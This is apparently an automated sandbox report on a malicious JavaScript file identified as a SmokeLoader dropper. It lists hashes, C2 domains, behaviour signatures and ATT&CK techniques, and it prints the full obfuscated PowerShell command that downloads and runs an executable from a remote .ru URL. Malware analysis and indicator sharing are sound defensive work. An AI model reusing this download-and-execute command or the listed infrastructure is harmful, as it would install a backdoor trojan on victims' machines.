Analysis

  • max time kernel
    150s
  • max time network
    137s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    21-01-2021 17:55

General

  • Target

    file.js

  • Size

    27KB

  • MD5

    c25cf17b8ec2aab1ae5222db7fa83368

  • SHA1

    2e78dc32dbac62df2ed6223813ea91b9b2de0ff4

  • SHA256

    24c7a1cec052e9f92013628100f19dd8b3f564c3bdaa2f8339a74e37146684c6

  • SHA512

    44cc5dd4b69faedc7e7c265dc70fa014622754f09758a0ae519aeb5c3d4f1a4be9cf2e43ee3903d77430328ea7af04d1bce5b0329c115e01afe01010d4df1148

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://citycapproperty.ru/localmod/nmode.exe

Extracted

Family

smokeloader

Version

2020

C2

http://smbproperty.ru/

http://gmbshop.ru/

http://baksproperty.gov.ug/

http://magistralpsw.ru/

http://mpmanagertzz.ru/

http://powerglasspot.ru/

http://autopartswarehouses.ru/

http://memoloves.ru/

http://alfavanilin.ru/

rc4.i32
rc4.i32

Signatures

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 2521 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\file.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:644
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c pOwEr^shEll -ex^ecution^pol^icy b^ypa^ss -n^oprof^ile -w h^idd^en $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://citycapproperty.ru/localmod/nmode.exe','%temp%wlS16.exe'); & %temp%wlS16.exe & mtOiVwFENbWSfhv
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1880
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        pOwErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://citycapproperty.ru/localmod/nmode.exe','C:\Users\Admin\AppData\Local\TempwlS16.exe');
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2944
      • C:\Users\Admin\AppData\Local\TempwlS16.exe
        C:\Users\Admin\AppData\Local\TempwlS16.exe
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Checks SCSI registry key(s)
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        PID:3268

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

System Information Discovery

2
T1082

Query Registry

1
T1012

Peripheral Device Discovery

1
T1120

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\TempwlS16.exe
    MD5

    057887b52388981063d44ae2ffff29a7

    SHA1

    123ba07b28b49215d4d7b83fbf38cb2a9e0c8b56

    SHA256

    c65ea9eee506b0a71170d4e3778d3ccadda12f67217e89e3b93db61890ab548d

    SHA512

    3440dccd9e39a49b7f37943ccef70eff5bd1fe89c812b82b64df13ab9634f91b585a7d8ae723a94abd9a2c1938378c46a6beb581c1c6337ccefdd8b2c4c0ee5b

  • C:\Users\Admin\AppData\Local\TempwlS16.exe
    MD5

    057887b52388981063d44ae2ffff29a7

    SHA1

    123ba07b28b49215d4d7b83fbf38cb2a9e0c8b56

    SHA256

    c65ea9eee506b0a71170d4e3778d3ccadda12f67217e89e3b93db61890ab548d

    SHA512

    3440dccd9e39a49b7f37943ccef70eff5bd1fe89c812b82b64df13ab9634f91b585a7d8ae723a94abd9a2c1938378c46a6beb581c1c6337ccefdd8b2c4c0ee5b

  • \Users\Admin\AppData\Local\Temp\9419.tmp
    MD5

    50741b3f2d7debf5d2bed63d88404029

    SHA1

    56210388a627b926162b36967045be06ffb1aad3

    SHA256

    f2f8732ae464738372ff274b7e481366cecdd2337210d4a3cbcd089c958a730c

    SHA512

    fac6bfe35b1ee08b3d42d330516a260d9cdb4a90bbb0491411a583029b92a59d20af3552372ea8fb3f59442b3945bf524ef284127f397ae7179467080be8e9b3

  • memory/1880-2-0x0000000000000000-mapping.dmp
  • memory/2944-6-0x000001F13E0A0000-0x000001F13E0A1000-memory.dmp
    Filesize

    4KB

  • memory/2944-7-0x000001F1216C0000-0x000001F1216C2000-memory.dmp
    Filesize

    8KB

  • memory/2944-8-0x000001F1216C3000-0x000001F1216C5000-memory.dmp
    Filesize

    8KB

  • memory/2944-9-0x000001F1216C6000-0x000001F1216C8000-memory.dmp
    Filesize

    8KB

  • memory/2944-5-0x000001F1231C0000-0x000001F1231C1000-memory.dmp
    Filesize

    4KB

  • memory/2944-4-0x00007FFC34C00000-0x00007FFC355EC000-memory.dmp
    Filesize

    9.9MB

  • memory/2944-3-0x0000000000000000-mapping.dmp
  • memory/3028-17-0x0000000000870000-0x0000000000886000-memory.dmp
    Filesize

    88KB

  • memory/3268-10-0x0000000000000000-mapping.dmp
  • memory/3268-13-0x0000000003270000-0x0000000003271000-memory.dmp
    Filesize

    4KB

  • memory/3268-16-0x0000000000400000-0x000000000040A000-memory.dmp
    Filesize

    40KB

  • memory/3268-15-0x0000000000030000-0x000000000003A000-memory.dmp
    Filesize

    40KB